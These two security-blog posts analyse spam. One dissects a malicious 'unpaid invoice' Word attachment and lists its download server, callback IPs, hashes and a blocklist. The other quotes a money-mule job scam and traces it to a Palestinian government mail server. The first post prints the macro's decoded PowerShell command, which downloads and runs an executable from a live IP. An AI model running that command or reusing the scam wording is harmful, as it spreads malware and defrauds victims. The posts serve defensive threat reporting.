Sponsored by..

Showing posts with label Palestine. Show all posts
Showing posts with label Palestine. Show all posts

Wednesday 18 March 2015

Malware spam: "December unpaid invoice notification"

This spam comes with no body text, but does come with a malicious attachment.

From:    Korey Mack
Date:    18 March 2015 at 11:04
Subject:    December unpaid invoice notification
So far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\huiUGI8t8dsF.cab'); expand %TEMP%\huiUGI8t8dsF.cab %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;
Although the EXE file from 176.31.28.244 (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.

This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs:

31.25.77.154 (Call U Communications, Palestine)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
188.165.5.194 (OVH, Ireland)
188.165.26.237 (OVH, Latvia)
115.241.60.56 (Reliance Communication, India)
46.19.143.151 (Private Layer INC, Switzerland)

Recommended blocklist:
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244



Tuesday 24 August 2010

There's more to this than meets the eye..

This is a straightforward money mule pitch, so nothing very interesting in the message itself..

From: james roberts <jamesroberts02@sify.com>
Reply-to: james.roberts@sify.com
Date: 24 August 2010 13:13
subject: JOB OFFER:APPLY IF YOU ARE INTERESTED.
   

  Hello,
      
        My name is JAMES ROBERTS , a designer also the Manager of JAMES ROBERTS FABRIC and Consultant live and work here in United Kingdom,will you like to work online from home and get paid without affecting your present job?
          
        Actually I need a representative who can be working for the company as online book-keeper. We make lots of supplies to some of our clients in the USA/CANADA/EUROPE, for which I do come to USA/CANADA/EUROPE to receive payment and have it cashed after I supply them raw materials. It’s always too expensive and stressful for me to come down and receive such payment twice in a month so I therefore decided to contact you.
      
        I am willing to  pay you 10% for every payment receive by you from our clients who makes payment through you.   Please note you don't have to be a book keeper to apply for the job.
      
        Kindly get back to me as soon as possible if you are interested in this job offer with your details:
      
        FULL NAMES...................
        ADDRESS ..................
        STATE..................
        ZIPCODE................
        COUNTRY................
        PHONE NUMBER(S)........
        GENDER.................
        AGE....................
        OCCUPATION.............
          
        Yours Faithfully,
     
        JAMES ROBERTS

But the headers tell an interesting story..

Received: from mail.pna.ps ([213.244.123.84])
    by ********** with esmtp (Exim 4.69)
    id 1Onsd0-0004Yt-Jc
    for **********; Tue, 24 Aug 2010 13:29:22 +0100
Received: from User (unknown [60.18.167.17])
    by mail.pna.ps (Postfix) with ESMTPA id ED6A94476F;
    Tue, 24 Aug 2010 15:12:09 +0300 (IDT)

You can only really trust the last hop before it hits your mail server (in truth, not always then either). That IP is 213.244.123.84 which is indeed mail.pna.ps.

So what the heck is .ps? Well, it turns out to be the TLD for Palestine, and the PNA is the Palestinian National Authority, with servers that look to be based in Ramallah on the West Bank.  So, it looks like the PNA mail servers are either insecure or compromised.

Did you even know that Palestine had a TLD of its own? I didn't.. so I guess this spam has tought me something!